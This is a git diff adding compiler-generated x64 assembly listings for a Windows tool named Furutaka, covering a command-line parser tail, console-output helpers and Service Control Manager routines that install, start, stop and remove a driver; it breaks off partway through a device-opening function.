+$LN37@GetCommand:
+ movzx eax, cx
+$LL9@GetCommand:
+ movzx ecx, ax
+ cmp ax, di
+ je SHORT $LN10@GetCommand
+ test ax, ax
+ je SHORT $LN10@GetCommand
+; Line 43
+ inc edx
+; Line 44
+ cmp ebx, esi
+ jne SHORT $LN18@GetCommand
+; Line 45
+ cmp edx, r9d
+ jae SHORT $LN18@GetCommand
+ test r8, r8
+ je SHORT $LN18@GetCommand
+; Line 46
+ mov WORD PTR [r8], ax
+; Line 47
+ add r8, 2
+$LN18@GetCommand:
+; Line 49
+ add r10, 2
+ movzx ecx, WORD PTR [r10]
+ movzx eax, cx
+ cmp cx, r15w
+ jne SHORT $LL9@GetCommand
+$LN10@GetCommand:
+; Line 23
+ inc ebx
+ lea rax, QWORD PTR [r10+2]
+ test cx, cx
+ cmove rax, r10
+ mov r10, rax
+ cmp ebx, esi
+ jbe $LL4@GetCommand
+$zero_term_exit$43:
+; Line 58
+ test r8, r8
+ je SHORT $LN20@GetCommand
+ test r9d, r9d
+ je SHORT $LN20@GetCommand
+; Line 59
+ mov WORD PTR [r8], bp
+$LN20@GetCommand:
+; Line 61
+ test r11, r11
+ je SHORT $LN21@GetCommand
+; Line 62
+ mov DWORD PTR [r11], edx
+$LN21@GetCommand:
+; Line 64
+ cmp edx, r9d
+ jae $LN22@GetCommand
+; Line 65
+ mov eax, 1
+ jmp $LN23@GetCommand
+GetCommandLineParamW ENDP
+_TEXT ENDS
+END
diff --git a/Source/Furutaka/output/x64/Release/asmlist/cui.asm b/Source/Furutaka/output/x64/Release/asmlist/cui.asm
new file mode 100644
index 0000000..2ab096e
--- /dev/null
+++ b/Source/Furutaka/output/x64/Release/asmlist/cui.asm
@@ -0,0 +1,494 @@
+; Listing generated by Microsoft (R) Optimizing Compiler Version 19.28.29335.0
+
+include listing.inc
+
+INCLUDELIB LIBCMT
+INCLUDELIB OLDNAMES
+
+PUBLIC g_ConOut
+PUBLIC g_ConIn
+PUBLIC g_ConsoleOutput
+PUBLIC g_BE
+_BSS SEGMENT
+g_ConOut DQ 01H DUP (?)
+g_ConIn DQ 01H DUP (?)
+g_ConsoleOutput DD 01H DUP (?)
+_BSS ENDS
+_DATA SEGMENT
+g_BE DW 0feffH
+_DATA ENDS
+PUBLIC cuiInitialize
+PUBLIC cuiPrintTextA
+PUBLIC cuiPrintTextW
+PUBLIC cuiPrintTextLastErrorA
+PUBLIC cuiPrintTextLastErrorW
+PUBLIC cuiClrScr
+PUBLIC ??_C@_02PCIJFNDE@?$AN?6@ ; `string'
+PUBLIC ??_C@_15JNBOKNOG@?$AA?$AN?$AA?6@ ; `string'
+EXTRN __imp_GetStdHandle:PROC
+EXTRN __imp_WriteFile:PROC
+EXTRN __imp_GetLastError:PROC
+EXTRN __imp_HeapAlloc:PROC
+EXTRN __imp_HeapFree:PROC
+EXTRN __imp_GetProcessHeap:PROC
+EXTRN __imp_FormatMessageA:PROC
+EXTRN __imp_FormatMessageW:PROC
+EXTRN __imp_GetConsoleMode:PROC
+EXTRN __imp_SetConsoleMode:PROC
+EXTRN __imp_WriteConsoleA:PROC
+EXTRN __imp_WriteConsoleW:PROC
+EXTRN __imp_FillConsoleOutputCharacterW:PROC
+EXTRN __imp_FillConsoleOutputAttribute:PROC
+EXTRN __imp_GetConsoleScreenBufferInfo:PROC
+EXTRN __imp_SetConsoleCursorPosition:PROC
+EXTRN _strcpy_a:PROC
+EXTRN _strcpy_w:PROC
+EXTRN _strcat_a:PROC
+EXTRN _strcat_w:PROC
+EXTRN _strlen_a:PROC
+EXTRN _strlen_w:PROC
+; COMDAT pdata
+pdata SEGMENT
+$pdata$cuiInitialize DD imagerel $LN7
+ DD imagerel $LN7+173
+ DD imagerel $unwind$cuiInitialize
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$cuiPrintTextA DD imagerel $LN13
+ DD imagerel $LN13+207
+ DD imagerel $unwind$cuiPrintTextA
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$cuiPrintTextW DD imagerel $LN13
+ DD imagerel $LN13+215
+ DD imagerel $unwind$cuiPrintTextW
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$cuiPrintTextLastErrorA DD imagerel $LN4
+ DD imagerel $LN4+84
+ DD imagerel $unwind$cuiPrintTextLastErrorA
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$cuiPrintTextLastErrorW DD imagerel $LN4
+ DD imagerel $LN4+84
+ DD imagerel $unwind$cuiPrintTextLastErrorW
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$cuiClrScr DD imagerel $LN8
+ DD imagerel $LN8+173
+ DD imagerel $unwind$cuiClrScr
+pdata ENDS
+; COMDAT ??_C@_15JNBOKNOG@?$AA?$AN?$AA?6@
+CONST SEGMENT
+??_C@_15JNBOKNOG@?$AA?$AN?$AA?6@ DB 0dH, 00H, 0aH, 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_02PCIJFNDE@?$AN?6@
+CONST SEGMENT
+??_C@_02PCIJFNDE@?$AN?6@ DB 0dH, 0aH, 00H ; `string'
+CONST ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$cuiClrScr DD 040a01H
+ DD 0e640aH
+ DD 07006920aH
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$cuiPrintTextLastErrorW DD 030901H
+ DD 0880109H
+ DD 03002H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$cuiPrintTextLastErrorA DD 030901H
+ DD 0480109H
+ DD 03002H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$cuiPrintTextW DD 061801H
+ DD 0a6418H
+ DD 093418H
+ DD 070145218H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$cuiPrintTextA DD 061801H
+ DD 0a6418H
+ DD 093418H
+ DD 070145218H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$cuiInitialize DD 040a01H
+ DD 09340aH
+ DD 07006520aH
+xdata ENDS
+; Function compile flags: /Ogspy
+; COMDAT cuiClrScr
+_TEXT SEGMENT
+csbi$ = 48
+coordScreen$ = 96
+cCharsWritten$ = 104
+cuiClrScr PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\cui.c
+; Line 69
+$LN8:
+ mov QWORD PTR [rsp+24], rsi
+ push rdi
+ sub rsp, 80 ; 00000050H
+; Line 78
+ mov rcx, QWORD PTR g_ConOut
+ lea rdx, QWORD PTR csbi$[rsp]
+ xor esi, esi
+ mov DWORD PTR coordScreen$[rsp], esi
+ call QWORD PTR __imp_GetConsoleScreenBufferInfo
+ test eax, eax
+ je SHORT $LN1@cuiClrScr
+; Line 81
+ movsx eax, WORD PTR csbi$[rsp]
+; Line 83
+ lea edx, QWORD PTR [rsi+32]
+ movsx edi, WORD PTR csbi$[rsp+2]
+ mov r9d, esi
+ mov rcx, QWORD PTR g_ConOut
+ imul edi, eax
+ lea rax, QWORD PTR cCharsWritten$[rsp]
+ mov QWORD PTR [rsp+32], rax
+ mov r8d, edi
+ call QWORD PTR __imp_FillConsoleOutputCharacterW
+ test eax, eax
+ je SHORT $LN1@cuiClrScr
+; Line 87
+ mov rcx, QWORD PTR g_ConOut
+ lea rdx, QWORD PTR csbi$[rsp]
+ call QWORD PTR __imp_GetConsoleScreenBufferInfo
+ test eax, eax
+ je SHORT $LN1@cuiClrScr
+; Line 90
+ movzx edx, WORD PTR csbi$[rsp+8]
+ lea rax, QWORD PTR cCharsWritten$[rsp]
+ mov rcx, QWORD PTR g_ConOut
+ mov r9d, esi
+ mov r8d, edi
+ mov QWORD PTR [rsp+32], rax
+ call QWORD PTR __imp_FillConsoleOutputAttribute
+ test eax, eax
+ je SHORT $LN1@cuiClrScr
+; Line 94
+ mov rcx, QWORD PTR g_ConOut
+ mov edx, esi
+ call QWORD PTR __imp_SetConsoleCursorPosition
+$LN1@cuiClrScr:
+; Line 95
+ mov rsi, QWORD PTR [rsp+112]
+ add rsp, 80 ; 00000050H
+ pop rdi
+ ret 0
+cuiClrScr ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT cuiPrintTextLastErrorW
+_TEXT SEGMENT
+szTextBuffer$ = 64
+UseReturn$ = 1104
+cuiPrintTextLastErrorW PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\cui.c
+; Line 217
+$LN4:
+ push rbx
+ sub rsp, 1088 ; 00000440H
+ mov ebx, ecx
+; Line 219
+ call QWORD PTR __imp_GetLastError
+; Line 221
+ and QWORD PTR [rsp+48], 0
+ lea rcx, QWORD PTR szTextBuffer$[rsp]
+ mov DWORD PTR [rsp+40], 512 ; 00000200H
+ mov r9d, 1024 ; 00000400H
+ mov QWORD PTR [rsp+32], rcx
+ mov r8d, eax
+ mov ecx, 4096 ; 00001000H
+ xor edx, edx
+ call QWORD PTR __imp_FormatMessageW
+; Line 222
+ mov edx, ebx
+ lea rcx, QWORD PTR szTextBuffer$[rsp]
+ call cuiPrintTextW
+; Line 223
+ add rsp, 1088 ; 00000440H
+ pop rbx
+ ret 0
+cuiPrintTextLastErrorW ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT cuiPrintTextLastErrorA
+_TEXT SEGMENT
+szTextBuffer$ = 64
+UseReturn$ = 592
+cuiPrintTextLastErrorA PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\cui.c
+; Line 197
+$LN4:
+ push rbx
+ sub rsp, 576 ; 00000240H
+ mov ebx, ecx
+; Line 199
+ call QWORD PTR __imp_GetLastError
+; Line 201
+ and QWORD PTR [rsp+48], 0
+ lea rcx, QWORD PTR szTextBuffer$[rsp]
+ mov DWORD PTR [rsp+40], 512 ; 00000200H
+ mov r9d, 1024 ; 00000400H
+ mov QWORD PTR [rsp+32], rcx
+ mov r8d, eax
+ mov ecx, 4096 ; 00001000H
+ xor edx, edx
+ call QWORD PTR __imp_FormatMessageA
+; Line 202
+ mov edx, ebx
+ lea rcx, QWORD PTR szTextBuffer$[rsp]
+ call cuiPrintTextA
+; Line 203
+ add rsp, 576 ; 00000240H
+ pop rbx
+ ret 0
+cuiPrintTextLastErrorA ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT cuiPrintTextW
+_TEXT SEGMENT
+bytesIO$ = 64
+lpText$ = 64
+UseReturn$ = 72
+cuiPrintTextW PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\cui.c
+; Line 154
+$LN13:
+; Line 159
+ test rcx, rcx
+ je $LN11@cuiPrintTe
+ mov QWORD PTR [rsp+16], rbx
+ mov QWORD PTR [rsp+24], rsi
+ push rdi
+ sub rsp, 48 ; 00000030H
+; Line 154
+ mov esi, edx
+ mov rdi, rcx
+; Line 162
+ call _strlen_w
+; Line 163
+ lea r8, QWORD PTR [rax-1]
+ cmp r8, 1039 ; 0000040fH
+ ja $LN4@cuiPrintTe
+; Line 166
+ lea rbx, QWORD PTR [rax*2+6]
+; Line 167
+ call QWORD PTR __imp_GetProcessHeap
+ mov r8, rbx
+ mov edx, 8
+ mov rcx, rax
+ call QWORD PTR __imp_HeapAlloc
+ mov rbx, rax
+; Line 168
+ test rax, rax
+ je SHORT $LN4@cuiPrintTe
+; Line 170
+ mov rdx, rdi
+ mov rcx, rax
+ call _strcpy_w
+; Line 171
+ test esi, esi
+ je SHORT $LN6@cuiPrintTe
+ lea rdx, OFFSET FLAT:??_C@_15JNBOKNOG@?$AA?$AN?$AA?6@
+ mov rcx, rbx
+ call _strcat_w
+$LN6@cuiPrintTe:
+; Line 173
+ mov rcx, rbx
+ call _strlen_w
+; Line 175
+ and QWORD PTR [rsp+32], 0
+ lea r9, QWORD PTR bytesIO$[rsp]
+ cmp DWORD PTR g_ConsoleOutput, 0
+ mov rdx, rbx
+ mov rcx, QWORD PTR g_ConOut
+ je SHORT $LN7@cuiPrintTe
+; Line 176
+ mov r8d, eax
+ call QWORD PTR __imp_WriteConsoleW
+; Line 177
+ jmp SHORT $LN8@cuiPrintTe
+$LN7@cuiPrintTe:
+; Line 179
+ lea r8d, DWORD PTR [rax+rax]
+ call QWORD PTR __imp_WriteFile
+$LN8@cuiPrintTe:
+; Line 181
+ call QWORD PTR __imp_GetProcessHeap
+ mov r8, rbx
+ xor edx, edx
+ mov rcx, rax
+ call QWORD PTR __imp_HeapFree
+$LN4@cuiPrintTe:
+; Line 183
+ mov rbx, QWORD PTR [rsp+72]
+ mov rsi, QWORD PTR [rsp+80]
+ add rsp, 48 ; 00000030H
+ pop rdi
+$LN11@cuiPrintTe:
+ ret 0
+cuiPrintTextW ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT cuiPrintTextA
+_TEXT SEGMENT
+bytesIO$ = 64
+lpText$ = 64
+UseReturn$ = 72
+cuiPrintTextA PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\cui.c
+; Line 110
+$LN13:
+; Line 115
+ test rcx, rcx
+ je $LN11@cuiPrintTe
+ mov QWORD PTR [rsp+16], rbx
+ mov QWORD PTR [rsp+24], rsi
+ push rdi
+ sub rsp, 48 ; 00000030H
+; Line 110
+ mov esi, edx
+ mov rdi, rcx
+; Line 118
+ call _strlen_a
+; Line 119
+ lea r8, QWORD PTR [rax-1]
+ cmp r8, 1039 ; 0000040fH
+ ja $LN4@cuiPrintTe
+; Line 122
+ lea rbx, QWORD PTR [rax+5]
+; Line 123
+ call QWORD PTR __imp_GetProcessHeap
+ mov r8, rbx
+ mov edx, 8
+ mov rcx, rax
+ call QWORD PTR __imp_HeapAlloc
+ mov rbx, rax
+; Line 124
+ test rax, rax
+ je SHORT $LN4@cuiPrintTe
+; Line 126
+ mov rdx, rdi
+ mov rcx, rax
+ call _strcpy_a
+; Line 127
+ test esi, esi
+ je SHORT $LN6@cuiPrintTe
+ lea rdx, OFFSET FLAT:??_C@_02PCIJFNDE@?$AN?6@
+ mov rcx, rbx
+ call _strcat_a
+$LN6@cuiPrintTe:
+; Line 129
+ mov rcx, rbx
+ call _strlen_a
+; Line 131
+ and QWORD PTR [rsp+32], 0
+ lea r9, QWORD PTR bytesIO$[rsp]
+ cmp DWORD PTR g_ConsoleOutput, 0
+ mov r8d, eax
+ mov rcx, QWORD PTR g_ConOut
+ mov rdx, rbx
+ je SHORT $LN7@cuiPrintTe
+; Line 132
+ call QWORD PTR __imp_WriteConsoleA
+; Line 133
+ jmp SHORT $LN8@cuiPrintTe
+$LN7@cuiPrintTe:
+; Line 135
+ call QWORD PTR __imp_WriteFile
+$LN8@cuiPrintTe:
+; Line 137
+ call QWORD PTR __imp_GetProcessHeap
+ mov r8, rbx
+ xor edx, edx
+ mov rcx, rax
+ call QWORD PTR __imp_HeapFree
+$LN4@cuiPrintTe:
+; Line 139
+ mov rbx, QWORD PTR [rsp+72]
+ mov rsi, QWORD PTR [rsp+80]
+ add rsp, 48 ; 00000030H
+ pop rdi
+$LN11@cuiPrintTe:
+ ret 0
+cuiPrintTextA ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT cuiInitialize
+_TEXT SEGMENT
+dummy$ = 64
+InitInput$ = 64
+IsConsoleOutput$ = 72
+cuiInitialize PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\cui.c
+; Line 37
+$LN7:
+ mov QWORD PTR [rsp+16], rbx
+ push rdi
+ sub rsp, 48 ; 00000030H
+ mov ebx, ecx
+ mov rdi, rdx
+; Line 40
+ mov ecx, -11 ; fffffff5H
+ call QWORD PTR __imp_GetStdHandle
+ mov QWORD PTR g_ConOut, rax
+; Line 42
+ test ebx, ebx
+ je SHORT $LN2@cuiInitial
+ mov ecx, -10 ; fffffff6H
+ call QWORD PTR __imp_GetStdHandle
+ mov QWORD PTR g_ConIn, rax
+ mov rax, QWORD PTR g_ConOut
+$LN2@cuiInitial:
+; Line 44
+ mov edx, 7
+ mov rcx, rax
+ call QWORD PTR __imp_SetConsoleMode
+; Line 47
+ mov rcx, QWORD PTR g_ConOut
+ lea rdx, QWORD PTR dummy$[rsp]
+ mov DWORD PTR g_ConsoleOutput, 1
+ call QWORD PTR __imp_GetConsoleMode
+ test eax, eax
+ jne SHORT $LN3@cuiInitial
+; Line 48
+ and DWORD PTR g_ConsoleOutput, eax
+; Line 49
+ lea r9, QWORD PTR dummy$[rsp]
+ and QWORD PTR [rsp+32], 0
+ lea r8d, QWORD PTR [rax+2]
+ mov rcx, QWORD PTR g_ConOut
+ lea rdx, OFFSET FLAT:g_BE
+ call QWORD PTR __imp_WriteFile
+$LN3@cuiInitial:
+; Line 52
+ test rdi, rdi
+ je SHORT $LN4@cuiInitial
+; Line 53
+ mov eax, DWORD PTR g_ConsoleOutput
+ mov DWORD PTR [rdi], eax
+$LN4@cuiInitial:
+; Line 56
+ mov rbx, QWORD PTR [rsp+72]
+ add rsp, 48 ; 00000030H
+ pop rdi
+ ret 0
+cuiInitialize ENDP
+_TEXT ENDS
+END
diff --git a/Source/Furutaka/output/x64/Release/asmlist/instdrv.asm b/Source/Furutaka/output/x64/Release/asmlist/instdrv.asm
new file mode 100644
index 0000000..22d1f8d
--- /dev/null
+++ b/Source/Furutaka/output/x64/Release/asmlist/instdrv.asm
@@ -0,0 +1,521 @@
+; Listing generated by Microsoft (R) Optimizing Compiler Version 19.28.29335.0
+
+include listing.inc
+
+INCLUDELIB LIBCMT
+INCLUDELIB OLDNAMES
+
+PUBLIC scmInstallDriver
+PUBLIC scmStartDriver
+PUBLIC scmOpenDevice
+PUBLIC scmStopDriver
+PUBLIC scmRemoveDriver
+PUBLIC scmUnloadDeviceDriver
+PUBLIC scmLoadDeviceDriver
+PUBLIC ??_C@_1O@GHDNIFBI@?$AA?2?$AA?2?$AA?4?$AA?2?$AA?$CF?$AAs@ ; `string'
+EXTRN __imp_CreateFileW:PROC
+EXTRN __imp_CloseHandle:PROC
+EXTRN __imp_GetLastError:PROC
+EXTRN __imp_SetLastError:PROC
+EXTRN __imp_Sleep:PROC
+EXTRN __imp_wsprintfW:PROC
+EXTRN __imp_CloseServiceHandle:PROC
+EXTRN __imp_ControlService:PROC
+EXTRN __imp_CreateServiceW:PROC
+EXTRN __imp_DeleteService:PROC
+EXTRN __imp_OpenSCManagerW:PROC
+EXTRN __imp_OpenServiceW:PROC
+EXTRN __imp_StartServiceW:PROC
+; COMDAT pdata
+pdata SEGMENT
+$pdata$RtlSecureZeroMemory DD imagerel $LN4
+ DD imagerel $LN4+27
+ DD imagerel $unwind$RtlSecureZeroMemory
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$scmInstallDriver DD imagerel $LN5
+ DD imagerel $LN5+96
+ DD imagerel $unwind$scmInstallDriver
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$scmStartDriver DD imagerel $LN7
+ DD imagerel $LN7+90
+ DD imagerel $unwind$scmStartDriver
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$scmOpenDevice DD imagerel $LN9
+ DD imagerel $LN9+146
+ DD imagerel $unwind$scmOpenDevice
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$scmStopDriver DD imagerel $LN15
+ DD imagerel $LN15+127
+ DD imagerel $unwind$scmStopDriver
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$scmRemoveDriver DD imagerel $LN5
+ DD imagerel $LN5+65
+ DD imagerel $unwind$scmRemoveDriver
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$scmUnloadDeviceDriver DD imagerel $LN6
+ DD imagerel $LN6+104
+ DD imagerel $unwind$scmUnloadDeviceDriver
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$scmLoadDeviceDriver DD imagerel $LN6
+ DD imagerel $LN6+156
+ DD imagerel $unwind$scmLoadDeviceDriver
+pdata ENDS
+; COMDAT ??_C@_1O@GHDNIFBI@?$AA?2?$AA?2?$AA?4?$AA?2?$AA?$CF?$AAs@
+CONST SEGMENT
+??_C@_1O@GHDNIFBI@?$AA?2?$AA?2?$AA?4?$AA?2?$AA?$CF?$AAs@ DB '\', 00H, '\', 00H
+ DB '.', 00H, '\', 00H, '%', 00H, 's', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$scmLoadDeviceDriver DD 0a1901H
+ DD 097419H
+ DD 086419H
+ DD 075419H
+ DD 063419H
+ DD 0e0153219H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$scmUnloadDeviceDriver DD 060f01H
+ DD 07640fH
+ DD 06340fH
+ DD 0700b320fH
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$scmRemoveDriver DD 040a01H
+ DD 06340aH
+ DD 07006320aH
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$scmStopDriver DD 060f01H
+ DD 0b640fH
+ DD 0a340fH
+ DD 0700b720fH
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$scmOpenDevice DD 050d01H
+ DD 01a340dH
+ DD 018010dH
+ DD 07006H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$scmStartDriver DD 040a01H
+ DD 06340aH
+ DD 07006320aH
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$scmInstallDriver DD 010701H
+ DD 0e207H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$RtlSecureZeroMemory DD 020501H
+ DD 017405H
+xdata ENDS
+; Function compile flags: /Ogspy
+; COMDAT scmLoadDeviceDriver
+_TEXT SEGMENT
+Name$ = 48
+Path$ = 56
+lphDevice$ = 64
+scmLoadDeviceDriver PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\instdrv.c
+; Line 237
+$LN6:
+ mov rax, rsp
+ mov QWORD PTR [rax+8], rbx
+ mov QWORD PTR [rax+16], rbp
+ mov QWORD PTR [rax+24], rsi
+ mov QWORD PTR [rax+32], rdi
+ push r14
+ sub rsp, 32 ; 00000020H
+; Line 239
+ xor ebx, ebx
+ mov rbp, r8
+ mov r14, rdx
+ mov rdi, rcx
+; Line 241
+ test rcx, rcx
+ jne SHORT $LN2@scmLoadDev
+; Line 242
+ xor eax, eax
+ jmp SHORT $LN1@scmLoadDev
+$LN2@scmLoadDev:
+; Line 245
+ xor edx, edx
+ xor ecx, ecx
+ mov r8d, 983103 ; 000f003fH
+ call QWORD PTR __imp_OpenSCManagerW
+ mov rsi, rax
+; Line 246
+ test rax, rax
+ je SHORT $LN3@scmLoadDev
+; Line 247
+ mov rdx, rdi
+ mov rcx, rax
+ call scmRemoveDriver
+; Line 248
+ mov r8, r14
+ mov rdx, rdi
+ mov rcx, rsi
+ call scmInstallDriver
+; Line 249
+ mov rdx, rdi
+ mov rcx, rsi
+ call scmStartDriver
+; Line 250
+ mov rdx, rbp
+ mov rcx, rdi
+ call scmOpenDevice
+; Line 251
+ mov rcx, rsi
+ mov ebx, eax
+ call QWORD PTR __imp_CloseServiceHandle
+$LN3@scmLoadDev:
+; Line 253
+ mov eax, ebx
+$LN1@scmLoadDev:
+; Line 254
+ mov rbx, QWORD PTR [rsp+48]
+ mov rbp, QWORD PTR [rsp+56]
+ mov rsi, QWORD PTR [rsp+64]
+ mov rdi, QWORD PTR [rsp+72]
+ add rsp, 32 ; 00000020H
+ pop r14
+ ret 0
+scmLoadDeviceDriver ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT scmUnloadDeviceDriver
+_TEXT SEGMENT
+Name$ = 48
+scmUnloadDeviceDriver PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\instdrv.c
+; Line 207
+$LN6:
+ mov QWORD PTR [rsp+8], rbx
+ mov QWORD PTR [rsp+16], rsi
+ push rdi
+ sub rsp, 32 ; 00000020H
+; Line 209
+ xor ebx, ebx
+ mov rdi, rcx
+; Line 211
+ test rcx, rcx
+ jne SHORT $LN2@scmUnloadD
+; Line 212
+ xor eax, eax
+ jmp SHORT $LN1@scmUnloadD
+$LN2@scmUnloadD:
+; Line 215
+ xor edx, edx
+ xor ecx, ecx
+ mov r8d, 983103 ; 000f003fH
+ call QWORD PTR __imp_OpenSCManagerW
+ mov rsi, rax
+; Line 216
+ test rax, rax
+ je SHORT $LN3@scmUnloadD
+; Line 217
+ mov rdx, rdi
+ mov rcx, rax
+ call scmStopDriver
+; Line 218
+ mov rdx, rdi
+ mov rcx, rsi
+ call scmRemoveDriver
+; Line 219
+ mov rcx, rsi
+ mov ebx, eax
+ call QWORD PTR __imp_CloseServiceHandle
+$LN3@scmUnloadD:
+; Line 221
+ mov eax, ebx
+$LN1@scmUnloadD:
+; Line 222
+ mov rbx, QWORD PTR [rsp+48]
+ mov rsi, QWORD PTR [rsp+56]
+ add rsp, 32 ; 00000020H
+ pop rdi
+ ret 0
+scmUnloadDeviceDriver ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT scmRemoveDriver
+_TEXT SEGMENT
+SchSCManager$ = 48
+DriverName$ = 56
+scmRemoveDriver PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\instdrv.c
+; Line 184
+$LN5:
+ mov QWORD PTR [rsp+8], rbx
+ push rdi
+ sub rsp, 32 ; 00000020H
+; Line 188
+ mov r8d, 983551 ; 000f01ffH
+ xor ebx, ebx
+ call QWORD PTR __imp_OpenServiceW
+ mov rdi, rax
+; Line 189
+ test rax, rax
+ je SHORT $LN2@scmRemoveD
+; Line 190
+ mov rcx, rax
+ call QWORD PTR __imp_DeleteService
+; Line 191
+ mov rcx, rdi
+ mov ebx, eax
+ call QWORD PTR __imp_CloseServiceHandle
+$LN2@scmRemoveD:
+; Line 193
+ mov eax, ebx
+; Line 194
+ mov rbx, QWORD PTR [rsp+48]
+ add rsp, 32 ; 00000020H
+ pop rdi
+ ret 0
+scmRemoveDriver ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT scmStopDriver
+_TEXT SEGMENT
+serviceStatus$ = 32
+SchSCManager$ = 80
+DriverName$ = 88
+scmStopDriver PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\instdrv.c
+; Line 140
+$LN15:
+ mov QWORD PTR [rsp+8], rbx
+ mov QWORD PTR [rsp+16], rsi
+ push rdi
+ sub rsp, 64 ; 00000040H
+; Line 147
+ mov r8d, 983551 ; 000f01ffH
+ call QWORD PTR __imp_OpenServiceW
+ mov rdi, rax
+; Line 148
+ test rax, rax
+ je SHORT $LN1@scmStopDri
+$LN5@scmStopDri:
+; Line 152
+ mov ebx, 5
+$LL4@scmStopDri:
+; Line 154
+ xor ecx, ecx
+ call QWORD PTR __imp_SetLastError
+; Line 156
+ lea r8, QWORD PTR serviceStatus$[rsp]
+ mov edx, 1
+ mov rcx, rdi
+ call QWORD PTR __imp_ControlService
+ mov esi, eax
+; Line 157
+ test eax, eax
+ jne SHORT $LN3@scmStopDri
+; Line 160
+ call QWORD PTR __imp_GetLastError
+ cmp eax, 1051 ; 0000041bH
+ jne SHORT $LN3@scmStopDri
+; Line 163
+ lea ecx, QWORD PTR [rax-51]
+ call QWORD PTR __imp_Sleep
+; Line 164
+ sub ebx, 1
+; Line 165
+ jne SHORT $LL4@scmStopDri
+$LN3@scmStopDri:
+; Line 167
+ mov rcx, rdi
+ call QWORD PTR __imp_CloseServiceHandle
+; Line 169
+ mov eax, esi
+$LN1@scmStopDri:
+; Line 170
+ mov rbx, QWORD PTR [rsp+80]
+ mov rsi, QWORD PTR [rsp+88]
+ add rsp, 64 ; 00000040H
+ pop rdi
+ ret 0
+scmStopDriver ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT scmOpenDevice
+_TEXT SEGMENT
+completeDeviceName$ = 64
+DriverName$ = 208
+lphDevice$ = 216
+scmOpenDevice PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\instdrv.c
+; Line 100
+$LN9:
+ mov QWORD PTR [rsp+8], rbx
+ push rdi
+ sub rsp, 192 ; 000000c0H
+ mov r8, rcx
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ lea rdi, QWORD PTR completeDeviceName$[rsp]
+ xor eax, eax
+; File J:\Workspace\drivers\TDL\Source\Furutaka\instdrv.c
+; Line 100
+ mov rbx, rdx
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ mov ecx, 128 ; 00000080H
+; File J:\Workspace\drivers\TDL\Source\Furutaka\instdrv.c
+; Line 105
+ lea rdx, OFFSET FLAT:??_C@_1O@GHDNIFBI@?$AA?2?$AA?2?$AA?4?$AA?2?$AA?$CF?$AAs@
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ rep stosb
+; File J:\Workspace\drivers\TDL\Source\Furutaka\instdrv.c
+; Line 105
+ lea rcx, QWORD PTR completeDeviceName$[rsp]
+ call QWORD PTR __imp_wsprintfW
+; Line 107
+ and QWORD PTR [rsp+48], 0
+ lea rcx, QWORD PTR completeDeviceName$[rsp]
+ mov DWORD PTR [rsp+40], 128 ; 00000080H
+ xor r9d, r9d
+ xor r8d, r8d
+ mov DWORD PTR [rsp+32], 3
+ mov edx, -1073741824 ; c0000000H
+ call QWORD PTR __imp_CreateFileW
+; Line 115
+ cmp rax, -1
+ jne SHORT $LN2@scmOpenDev
+; Line 116
+ xor eax, eax
